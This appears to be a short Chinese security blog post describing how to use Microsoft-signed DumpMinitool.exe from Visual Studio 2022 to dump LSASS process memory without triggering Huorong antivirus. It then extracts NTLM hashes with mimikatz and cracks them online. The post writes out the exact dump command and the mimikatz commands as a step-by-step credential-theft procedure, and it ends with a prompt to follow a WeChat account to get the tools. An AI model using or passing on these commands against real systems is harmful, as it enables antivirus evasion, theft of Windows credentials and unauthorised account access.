最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为:
C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
接下来测试一下效果,先看一下程序信息
查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。
使用火绒对程序扫描:
使用程序执行命令
DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full
整个过程杀软没有任何动静。
dump完成后拿到本地使用mimikatz获取到ntlm,首先把lsass.dmp文件放到程序目录下,然后执行以下命令
mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords
执行完成后,拿到账户的ntlm值,使用解密网站解密即可获取到密码。
文章中使用的相关工具关注微信公众号并后台回复 “密码" 两字 即可获取